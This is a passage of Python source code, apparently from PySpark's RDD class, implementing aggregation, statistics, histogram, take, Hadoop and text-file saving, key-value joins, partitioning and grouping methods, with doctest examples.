>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10) >>> rdd.treeAggregate(0, add, add) -5 >>> rdd.treeAggregate(0, add, add, 1) -5 >>> rdd.treeAggregate(0, add, add, 2) -5 >>> rdd.treeAggregate(0, add, add, 5) -5 >>> rdd.treeAggregate(0, add, add, 10) -5 """ if depth < 1: raise ValueError("Depth cannot be smaller than 1 but got %d." % depth) if self.getNumPartitions() == 0: return zeroValue def aggregatePartition(iterator): acc = zeroValue for obj in iterator: acc = seqOp(acc, obj) yield acc partiallyAggregated = self.mapPartitions(aggregatePartition) numPartitions = partiallyAggregated.getNumPartitions() scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2) # If creating an extra level doesn't help reduce the wall-clock time, we stop the tree # aggregation. while numPartitions > scale + numPartitions / scale: numPartitions /= scale curNumPartitions = int(numPartitions) def mapPartition(i, iterator): for obj in iterator: yield (i % curNumPartitions, obj) partiallyAggregated = partiallyAggregated \ .mapPartitionsWithIndex(mapPartition) \ .reduceByKey(combOp, curNumPartitions) \ .values() return partiallyAggregated.reduce(combOp) def max(self, key=None): """ Find the maximum item in this RDD. :param key: A function used to generate key for comparing >>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0]) >>> rdd.max() 43.0 >>> rdd.max(key=str) 5.0 """ if key is None: return self.reduce(max) return self.reduce(lambda a, b: max(a, b, key=key)) def min(self, key=None): """ Find the minimum item in this RDD. :param key: A function used to generate key for comparing >>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0]) >>> rdd.min() 2.0 >>> rdd.min(key=str) 10.0 """ if key is None: return self.reduce(min) return self.reduce(lambda a, b: min(a, b, key=key)) def sum(self): """ Add up the elements in this RDD. >>> sc.parallelize([1.0, 2.0, 3.0]).sum() 6.0 """ return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add) def count(self): """ Return the number of elements in this RDD. >>> sc.parallelize([2, 3, 4]).count() 3 """ return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum() def stats(self): """ Return a L{StatCounter} object that captures the mean, variance and count of the RDD's elements in one operation. """ def redFunc(left_counter, right_counter): return left_counter.mergeStats(right_counter) return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc) def histogram(self, buckets): """ Compute a histogram using the provided buckets. The buckets are all open to the right except for the last which is closed. e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50], which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1 and 50 we would have a histogram of 1,0,1. If your histogram is evenly spaced (e.g. [0, 10, 20, 30]), this can be switched from an O(log n) inseration to O(1) per element (where n is the number of buckets). Buckets must be sorted, not contain any duplicates, and have at least two elements. If `buckets` is a number, it will generate buckets which are evenly spaced between the minimum and maximum of the RDD. For example, if the min value is 0 and the max is 100, given `buckets` as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must be at least 1. An exception is raised if the RDD contains infinity. If the elements in the RDD do not vary (max == min), a single bucket will be used. The return value is a tuple of buckets and histogram. >>> rdd = sc.parallelize(range(51)) >>> rdd.histogram(2) ([0, 25, 50], [25, 26]) >>> rdd.histogram([0, 5, 25, 50]) ([0, 5, 25, 50], [5, 20, 26]) >>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets ([0, 15, 30, 45, 60], [15, 15, 15, 6]) >>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"]) >>> rdd.histogram(("a", "b", "c")) (('a', 'b', 'c'), [2, 2]) """ if isinstance(buckets, int): if buckets < 1: raise ValueError("number of buckets must be >= 1") # filter out non-comparable elements def comparable(x): if x is None: return False if type(x) is float and isnan(x): return False return True filtered = self.filter(comparable) # faster than stats() def minmax(a, b): return min(a[0], b[0]), max(a[1], b[1]) try: minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax) except TypeError as e: if " empty " in str(e): raise ValueError("can not generate buckets from empty RDD") raise if minv == maxv or buckets == 1: return [minv, maxv], [filtered.count()] try: inc = (maxv - minv) / buckets except TypeError: raise TypeError("Can not generate buckets with non-number in RDD") if isinf(inc): raise ValueError("Can not generate buckets with infinite value") # keep them as integer if possible inc = int(inc) if inc * buckets != maxv - minv: inc = (maxv - minv) * 1.0 / buckets buckets = [i * inc + minv for i in range(buckets)] buckets.append(maxv) # fix accumulated error even = True elif isinstance(buckets, (list, tuple)): if len(buckets) < 2: raise ValueError("buckets should have more than one value") if any(i is None or isinstance(i, float) and isnan(i) for i in buckets): raise ValueError("can not have None or NaN in buckets") if sorted(buckets) != list(buckets): raise ValueError("buckets should be sorted") if len(set(buckets)) != len(buckets): raise ValueError("buckets should not contain duplicated values") minv = buckets[0] maxv = buckets[-1] even = False inc = None try: steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)] except TypeError: pass # objects in buckets do not support '-' else: if max(steps) - min(steps) < 1e-10: # handle precision errors even = True inc = (maxv - minv) / (len(buckets) - 1) else: raise TypeError("buckets should be a list or tuple or number(int or long)") def histogram(iterator): counters = [0] * len(buckets) for i in iterator: if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv: continue t = (int((i - minv) / inc) if even else bisect.bisect_right(buckets, i) - 1) counters[t] += 1 # add last two together last = counters.pop() counters[-1] += last return [counters] def mergeCounters(a, b): return [i + j for i, j in zip(a, b)] return buckets, self.mapPartitions(histogram).reduce(mergeCounters) def mean(self): """ Compute the mean of this RDD's elements. >>> sc.parallelize([1, 2, 3]).mean() 2.0 """ return self.stats().mean() def variance(self): """ Compute the variance of this RDD's elements. >>> sc.parallelize([1, 2, 3]).variance() 0.666... """ return self.stats().variance() def stdev(self): """ Compute the standard deviation of this RDD's elements. >>> sc.parallelize([1, 2, 3]).stdev() 0.816... """ return self.stats().stdev() def sampleStdev(self): """ Compute the sample standard deviation of this RDD's elements (which corrects for bias in estimating the standard deviation by dividing by N-1 instead of N). >>> sc.parallelize([1, 2, 3]).sampleStdev() 1.0 """ return self.stats().sampleStdev() def sampleVariance(self): """ Compute the sample variance of this RDD's elements (which corrects for bias in estimating the variance by dividing by N-1 instead of N). >>> sc.parallelize([1, 2, 3]).sampleVariance() 1.0 """ return self.stats().sampleVariance() def countByValue(self): """ Return the count of each unique value in this RDD as a dictionary of (value, count) pairs. >>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items()) [(1, 2), (2, 3)] """ def countPartition(iterator): counts = defaultdict(int) for obj in iterator: counts[obj] += 1 yield counts def mergeMaps(m1, m2): for k, v in m2.items(): m1[k] += v return m1 return self.mapPartitions(countPartition).reduce(mergeMaps) def top(self, num, key=None): """ Get the top N elements from an RDD. .. note:: This method should only be used if the resulting array is expected to be small, as all the data is loaded into the driver's memory. .. note:: It returns the list sorted in descending order. >>> sc.parallelize([10, 4, 2, 12, 3]).top(1) [12] >>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2) [6, 5] >>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str) [4, 3, 2] """ def topIterator(iterator): yield heapq.nlargest(num, iterator, key=key) def merge(a, b): return heapq.nlargest(num, a + b, key=key) return self.mapPartitions(topIterator).reduce(merge) def takeOrdered(self, num, key=None): """ Get the N elements from an RDD ordered in ascending order or as specified by the optional key function. .. note:: this method should only be used if the resulting array is expected to be small, as all the data is loaded into the driver's memory. >>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6) [1, 2, 3, 4, 5, 6] >>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x) [10, 9, 7, 6, 5, 4] """ def merge(a, b): return heapq.nsmallest(num, a + b, key) return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge) def take(self, num): """ Take the first num elements of the RDD. It works by first scanning one partition, and use the results from that partition to estimate the number of additional partitions needed to satisfy the limit. Translated from the Scala implementation in RDD#take(). .. note:: this method should only be used if the resulting array is expected to be small, as all the data is loaded into the driver's memory. >>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2) [2, 3] >>> sc.parallelize([2, 3, 4, 5, 6]).take(10) [2, 3, 4, 5, 6] >>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3) [91, 92, 93] """ items = [] totalParts = self.getNumPartitions() partsScanned = 0 while len(items) < num and partsScanned < totalParts: # The number of partitions to try in this iteration. # It is ok for this number to be greater than totalParts because # we actually cap it at totalParts in runJob. numPartsToTry = 1 if partsScanned > 0: # If we didn't find any rows after the previous iteration, # quadruple and retry. Otherwise, interpolate the number of # partitions we need to try, but overestimate it by 50%. # We also cap the estimation in the end. if len(items) == 0: numPartsToTry = partsScanned * 4 else: # the first paramter of max is >=1 whenever partsScanned >= 2 numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4) left = num - len(items) def takeUpToNumLeft(iterator): iterator = iter(iterator) taken = 0 while taken < left: yield next(iterator) taken += 1 p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts)) res = self.context.runJob(self, takeUpToNumLeft, p) items += res partsScanned += numPartsToTry return items[:num] def first(self): """ Return the first element in this RDD. >>> sc.parallelize([2, 3, 4]).first() 2 >>> sc.parallelize([]).first() Traceback (most recent call last): ... ValueError: RDD is empty """ rs = self.take(1) if rs: return rs[0] raise ValueError("RDD is empty") def isEmpty(self): """ Returns true if and only if the RDD contains no elements at all. .. note:: an RDD may be empty even when it has at least 1 partition. >>> sc.parallelize([]).isEmpty() True >>> sc.parallelize([1]).isEmpty() False """ return self.getNumPartitions() == 0 or len(self.take(1)) == 0 def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None): """ Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are converted for output using either user specified converters or, by default, L{org.apache.spark.api.python.JavaToWritableConverter}. :param conf: Hadoop job configuration, passed in as a dict :param keyConverter: (None by default) :param valueConverter: (None by default) """ jconf = self.ctx._dictToJavaMap(conf) pickledRDD = self._pickled() self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf, keyConverter, valueConverter, True) def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None, keyConverter=None, valueConverter=None, conf=None): """ Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types will be inferred if not specified. Keys and values are converted for output using either user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The C{conf} is applied on top of the base Hadoop conf associated with the SparkContext of this RDD to create a merged Hadoop MapReduce job configuration for saving the data. :param path: path to Hadoop file :param outputFormatClass: fully qualified classname of Hadoop OutputFormat (e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat") :param keyClass: fully qualified classname of key Writable class (e.g. "org.apache.hadoop.io.IntWritable", None by default) :param valueClass: fully qualified classname of value Writable class (e.g. "org.apache.hadoop.io.Text", None by default) :param keyConverter: (None by default) :param valueConverter: (None by default) :param conf: Hadoop job configuration, passed in as a dict (None by default) """ jconf = self.ctx._dictToJavaMap(conf) pickledRDD = self._pickled() self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path, outputFormatClass, keyClass, valueClass, keyConverter, valueConverter, jconf) def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None): """ Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file system, using the old Hadoop OutputFormat API (mapred package). Keys/values are converted for output using either user specified converters or, by default, L{org.apache.spark.api.python.JavaToWritableConverter}. :param conf: Hadoop job configuration, passed in as a dict :param keyConverter: (None by default) :param valueConverter: (None by default) """ jconf = self.ctx._dictToJavaMap(conf) pickledRDD = self._pickled() self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf, keyConverter, valueConverter, False) def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None, keyConverter=None, valueConverter=None, conf=None, compressionCodecClass=None): """ Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file system, using the old Hadoop OutputFormat API (mapred package). Key and value types will be inferred if not specified. Keys and values are converted for output using either user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The C{conf} is applied on top of the base Hadoop conf associated with the SparkContext of this RDD to create a merged Hadoop MapReduce job configuration for saving the data. :param path: path to Hadoop file :param outputFormatClass: fully qualified classname of Hadoop OutputFormat (e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat") :param keyClass: fully qualified classname of key Writable class (e.g. "org.apache.hadoop.io.IntWritable", None by default) :param valueClass: fully qualified classname of value Writable class (e.g. "org.apache.hadoop.io.Text", None by default) :param keyConverter: (None by default) :param valueConverter: (None by default) :param conf: (None by default) :param compressionCodecClass: (None by default) """ jconf = self.ctx._dictToJavaMap(conf) pickledRDD = self._pickled() self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path, outputFormatClass, keyClass, valueClass, keyConverter, valueConverter, jconf, compressionCodecClass) def saveAsSequenceFile(self, path, compressionCodecClass=None): """ Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file system, using the L{org.apache.hadoop.io.Writable} types that we convert from the RDD's key and value types. The mechanism is as follows: 1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects. 2. Keys and values of this Java RDD are converted to Writables and written out. :param path: path to sequence file :param compressionCodecClass: (None by default) """ pickledRDD = self._pickled() self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True, path, compressionCodecClass) def saveAsPickleFile(self, path, batchSize=10): """ Save this RDD as a SequenceFile of serialized objects. The serializer used is L{pyspark.serializers.PickleSerializer}, default batch size is 10. >>> tmpFile = NamedTemporaryFile(delete=True) >>> tmpFile.close() >>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3) >>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect()) ['1', '2', 'rdd', 'spark'] """ if batchSize == 0: ser = AutoBatchedSerializer(PickleSerializer()) else: ser = BatchedSerializer(PickleSerializer(), batchSize) self._reserialize(ser)._jrdd.saveAsObjectFile(path) @ignore_unicode_prefix def saveAsTextFile(self, path, compressionCodecClass=None): """ Save this RDD as a text file, using string representations of elements. @param path: path to text file @param compressionCodecClass: (None by default) string i.e. "org.apache.hadoop.io.compress.GzipCodec" >>> tempFile = NamedTemporaryFile(delete=True) >>> tempFile.close() >>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name) >>> from fileinput import input >>> from glob import glob >>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*")))) '0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n' Empty lines are tolerated when saving to text files. >>> tempFile2 = NamedTemporaryFile(delete=True) >>> tempFile2.close() >>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name) >>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*")))) '\\n\\n\\nbar\\nfoo\\n' Using compressionCodecClass >>> tempFile3 = NamedTemporaryFile(delete=True) >>> tempFile3.close() >>> codec = "org.apache.hadoop.io.compress.GzipCodec" >>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec) >>> from fileinput import input, hook_compressed >>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed)) >>> b''.join(result).decode('utf-8') u'bar\\nfoo\\n' """ def func(split, iterator): for x in iterator: if not isinstance(x, (unicode, bytes)): x = unicode(x) if isinstance(x, unicode): x = x.encode("utf-8") yield x keyed = self.mapPartitionsWithIndex(func) keyed._bypass_serializer = True if compressionCodecClass: compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass) keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec) else: keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path) # Pair functions def collectAsMap(self): """ Return the key-value pairs in this RDD to the master as a dictionary. .. note:: this method should only be used if the resulting data is expected to be small, as all the data is loaded into the driver's memory. >>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap() >>> m[1] 2 >>> m[3] 4 """ return dict(self.collect()) def keys(self): """ Return an RDD with the keys of each tuple. >>> m = sc.parallelize([(1, 2), (3, 4)]).keys() >>> m.collect() [1, 3] """ return self.map(lambda x: x[0]) def values(self): """ Return an RDD with the values of each tuple. >>> m = sc.parallelize([(1, 2), (3, 4)]).values() >>> m.collect() [2, 4] """ return self.map(lambda x: x[1]) def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash): """ Merge the values for each key using an associative and commutative reduce function. This will also perform the merging locally on each mapper before sending results to a reducer, similarly to a "combiner" in MapReduce. Output will be partitioned with C{numPartitions} partitions, or the default parallelism level if C{numPartitions} is not specified. Default partitioner is hash-partition. >>> from operator import add >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)]) >>> sorted(rdd.reduceByKey(add).collect()) [('a', 2), ('b', 1)] """ return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc) def reduceByKeyLocally(self, func): """ Merge the values for each key using an associative and commutative reduce function, but return the results immediately to the master as a dictionary. This will also perform the merging locally on each mapper before sending results to a reducer, similarly to a "combiner" in MapReduce. >>> from operator import add >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)]) >>> sorted(rdd.reduceByKeyLocally(add).items()) [('a', 2), ('b', 1)] """ def reducePartition(iterator): m = {} for k, v in iterator: m[k] = func(m[k], v) if k in m else v yield m def mergeMaps(m1, m2): for k, v in m2.items(): m1[k] = func(m1[k], v) if k in m1 else v return m1 return self.mapPartitions(reducePartition).reduce(mergeMaps) def countByKey(self): """ Count the number of elements for each key, and return the result to the master as a dictionary. >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)]) >>> sorted(rdd.countByKey().items()) [('a', 2), ('b', 1)] """ return self.map(lambda x: x[0]).countByValue() def join(self, other, numPartitions=None): """ Return an RDD containing all pairs of elements with matching keys in C{self} and C{other}. Each pair of elements will be returned as a (k, (v1, v2)) tuple, where (k, v1) is in C{self} and (k, v2) is in C{other}. Performs a hash join across the cluster. >>> x = sc.parallelize([("a", 1), ("b", 4)]) >>> y = sc.parallelize([("a", 2), ("a", 3)]) >>> sorted(x.join(y).collect()) [('a', (1, 2)), ('a', (1, 3))] """ return python_join(self, other, numPartitions) def leftOuterJoin(self, other, numPartitions=None): """ Perform a left outer join of C{self} and C{other}. For each element (k, v) in C{self}, the resulting RDD will either contain all pairs (k, (v, w)) for w in C{other}, or the pair (k, (v, None)) if no elements in C{other} have key k. Hash-partitions the resulting RDD into the given number of partitions. >>> x = sc.parallelize([("a", 1), ("b", 4)]) >>> y = sc.parallelize([("a", 2)]) >>> sorted(x.leftOuterJoin(y).collect()) [('a', (1, 2)), ('b', (4, None))] """ return python_left_outer_join(self, other, numPartitions) def rightOuterJoin(self, other, numPartitions=None): """ Perform a right outer join of C{self} and C{other}. For each element (k, w) in C{other}, the resulting RDD will either contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w)) if no elements in C{self} have key k. Hash-partitions the resulting RDD into the given number of partitions. >>> x = sc.parallelize([("a", 1), ("b", 4)]) >>> y = sc.parallelize([("a", 2)]) >>> sorted(y.rightOuterJoin(x).collect()) [('a', (2, 1)), ('b', (None, 4))] """ return python_right_outer_join(self, other, numPartitions) def fullOuterJoin(self, other, numPartitions=None): """ Perform a right outer join of C{self} and C{other}. For each element (k, v) in C{self}, the resulting RDD will either contain all pairs (k, (v, w)) for w in C{other}, or the pair (k, (v, None)) if no elements in C{other} have key k. Similarly, for each element (k, w) in C{other}, the resulting RDD will either contain all pairs (k, (v, w)) for v in C{self}, or the pair (k, (None, w)) if no elements in C{self} have key k. Hash-partitions the resulting RDD into the given number of partitions. >>> x = sc.parallelize([("a", 1), ("b", 4)]) >>> y = sc.parallelize([("a", 2), ("c", 8)]) >>> sorted(x.fullOuterJoin(y).collect()) [('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))] """ return python_full_outer_join(self, other, numPartitions) # TODO: add option to control map-side combining # portable_hash is used as default, because builtin hash of None is different # cross machines. def partitionBy(self, numPartitions, partitionFunc=portable_hash): """ Return a copy of the RDD partitioned using the specified partitioner. >>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x)) >>> sets = pairs.partitionBy(2).glom().collect() >>> len(set(sets[0]).intersection(set(sets[1]))) 0 """ if numPartitions is None: numPartitions = self._defaultReducePartitions() partitioner = Partitioner(numPartitions, partitionFunc) if self.partitioner == partitioner: return self # Transferring O(n) objects to Java is too expensive. # Instead, we'll form the hash buckets in Python, # transferring O(numPartitions) objects to Java. # Each object is a (splitNumber, [objects]) pair. # In order to avoid too huge objects, the objects are # grouped into chunks. outputSerializer = self.ctx._unbatched_serializer limit = (_parse_memory(self.ctx._conf.get( "spark.python.worker.memory", "512m")) / 2) def add_shuffle_key(split, iterator): buckets = defaultdict(list) c, batch = 0, min(10 * numPartitions, 1000) for k, v in iterator: buckets[partitionFunc(k) % numPartitions].append((k, v)) c += 1 # check used memory and avg size of chunk of objects if (c % 1000 == 0 and get_used_memory() > limit or c > batch): n, size = len(buckets), 0 for split in list(buckets.keys()): yield pack_long(split) d = outputSerializer.dumps(buckets[split]) del buckets[split] yield d size += len(d) avg = int(size / n) >> 20 # let 1M < avg < 10M if avg < 1: batch *= 1.5 elif avg > 10: batch = max(int(batch / 1.5), 1) c = 0 for split, items in buckets.items(): yield pack_long(split) yield outputSerializer.dumps(items) keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True) keyed._bypass_serializer = True with SCCallSiteSync(self.context) as css: pairRDD = self.ctx._jvm.PairwiseRDD( keyed._jrdd.rdd()).asJavaPairRDD() jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions, id(partitionFunc)) jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner)) rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer)) rdd.partitioner = partitioner return rdd # TODO: add control over map-side aggregation def combineByKey(self, createCombiner, mergeValue, mergeCombiners, numPartitions=None, partitionFunc=portable_hash): """ Generic function to combine the elements for each key using a custom set of aggregation functions. Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined type" C. Users provide three functions: - C{createCombiner}, which turns a V into a C (e.g., creates a one-element list) - C{mergeValue}, to merge a V into a C (e.g., adds it to the end of a list) - C{mergeCombiners}, to combine two C's into a single one (e.g., merges the lists) To avoid memory allocation, both mergeValue and mergeCombiners are allowed to modify and return their first argument instead of creating a new C. In addition, users can control the partitioning of the output RDD. .. note:: V and C can be different -- for example, one might group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]). >>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 2)]) >>> def to_list(a): ... return [a] ... >>> def append(a, b): ... a.append(b) ... return a ... >>> def extend(a, b): ... a.extend(b) ... return a ... >>> sorted(x.combineByKey(to_list, append, extend).collect()) [('a', [1, 2]), ('b', [1])] """ if numPartitions is None: numPartitions = self._defaultReducePartitions() serializer = self.ctx.serializer memory = self._memory_limit() agg = Aggregator(createCombiner, mergeValue, mergeCombiners) def combineLocally(iterator): merger = ExternalMerger(agg, memory * 0.9, serializer) merger.mergeValues(iterator) return merger.items() locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True) shuffled = locally_combined.partitionBy(numPartitions, partitionFunc) def _mergeCombiners(iterator): merger = ExternalMerger(agg, memory, serializer) merger.mergeCombiners(iterator) return merger.items() return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True) def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None, partitionFunc=portable_hash): """ Aggregate the values of each key, using given combine functions and a neutral "zero value". This function can return a different result type, U, than the type of the values in this RDD, V. Thus, we need one operation for merging a V into a U and one operation for merging two U's, The former operation is used for merging values within a partition, and the latter is used for merging values between partitions. To avoid memory allocation, both of these functions are allowed to modify and return their first argument instead of creating a new U. """ def createZero(): return copy.deepcopy(zeroValue) return self.combineByKey( lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc) def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash): """ Merge the values for each key using an associative function "func" and a neutral "zeroValue" which may be added to the result an arbitrary number of times, and must not change the result (e.g., 0 for addition, or 1 for multiplication.). >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)]) >>> from operator import add >>> sorted(rdd.foldByKey(0, add).collect()) [('a', 2), ('b', 1)] """ def createZero(): return copy.deepcopy(zeroValue) return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions, partitionFunc) def _memory_limit(self): return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m")) # TODO: support variant with custom partitioner def groupByKey(self, numPartitions=None, partitionFunc=portable_hash): """ Group the values for each key in the RDD into a single sequence. Hash-partitions the resulting RDD with numPartitions partitions. .. note:: If you are grouping in order to perform an aggregation (such as a sum or average) over each key, using reduceByKey or aggregateByKey will provide much better performance. >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)]) >>> sorted(rdd.groupByKey().mapValues(len).collect()) [('a', 2), ('b', 1)] >>> sorted(rdd.groupByKey().mapValues(list).collect()) [('a', [1, 1]), ('b', [1])] """ def createCombiner(x): return [x] def mergeValue(xs, x): xs.append(x) return xs def mergeCombiners(a, b): a.extend(b) return a memory = self._memory_limit() serializer = self._jrdd_deserializer agg = Aggregator(createCombiner, mergeValue, mergeCombiners) def combine(iterator): merger = ExternalMerger(agg, memory * 0.9, serializer) merger.mergeValues(iterator) return merger.items() locally_combined = self.mapPartitions(combine, preservesPartitioning=True) shuffled = locally_combined.partitionBy(numPartitions, partitionFunc) def groupByKey(it): merger = ExternalGroupBy(agg, memory, serializer) merger.mergeCombiners(it) return merger.items() return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable) def flatMapValues(self, f): """ Pass each value in the key-value pair RDD through a flatMap function without changing the keys; this also retains the original RDD's partitioning. >>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])]) >>> def f(x): return x >>> x.flatMapValues(f).collect() [('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')] """ flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1])) return self.flatMap(flat_map_fn, preservesPartitioning=True) def mapValues(self, f): """ Pass each value in the key-value pair RDD through a map function without changing the keys; this also retains the original RDD's partitioning. >>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])]) >>> def f(x): return len(x) >>> x.mapValues(f).collect() [('a', 3), ('b', 1)] """ map_values_fn = lambda kv: (kv[0], f(kv[1])) return self.map(map_values_fn, preservesPartitioning=True) def groupWith(self, other, *others): """ Alias for cogroup but with support for multiple RDDs. >>> w = sc.parallelize([("a", 5), ("b", 6)]) >>> x = sc.parallelize([("a", 1), ("b", 4)]) >>> y = sc.parallelize([("a", 2)]) >>> z = sc.parallelize([("b", 42)]) >>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))] [('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))] """ return python_cogroup((self, other) + others, numPartitions=None) # TODO: add variant with custom parittioner def cogroup(self, other, numPartitions=None): """ For each key k in C{self} or C{other}, return a resulting RDD that contains a tuple with the list of values for that key in C{self} as well as C{other}. >>> x = sc.parallelize([("a", 1), ("b", 4)]) >>> y = sc.parallelize([("a", 2)]) >>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))] [('a', ([1], [2])), ('b', ([4], []))] """ return python_cogroup((self, other), numPartitions) def sampleByKey(self, withReplacement, fractions, seed=None): """ Return a subset of this RDD sampled by key (via stratified sampling). Create a sample of this RDD using variable sampling rates for different keys as specified by fractions, a key to sampling rate map. >>> fractions = {"a": 0.2, "b": 0.1} >>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000))) >>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect()) >>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150 True >>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0 True >>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0 True """ for fraction in fractions.values(): assert fraction >= 0.0, "Negative fraction value: %s" % fraction return self.mapPartitionsWithIndex( RDDStratifiedSampler(withReplacement, fractions, seed).func, True) def subtractByKey(self, other, numPartitions=None): """ Return each (key, value) pair in C{self} that has no pair with matching key in C{other}. >>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)]) >>> y = sc.parallelize([("a", 3), ("c", None)]) >>> sorted(x.subtractByKey(y).collect()) [('b', 4), ('b', 5)] """ def filter_func(pair): key, (val1, val2) = pair return val1 and not val2 return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0]) def subtract(self, other, numPartitions=None): """ Return each value in C{self} that is not contained in C{other}. >>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)]) >>> y = sc.parallelize([("a", 3), ("c", None)]) >>> sorted(x.subtract(y).collect()) [('a', 1), ('b', 4), ('b', 5)] """ # note: here 'True' is just a placeholder rdd = other.map(lambda x: (x, True)) return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys() def keyBy(self, f): """ Creates tuples of the elements in this RDD by applying C{f}. >>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x) >>> y = sc.parallelize(zip(range(0,5), range(0,5))) >>> [(x, 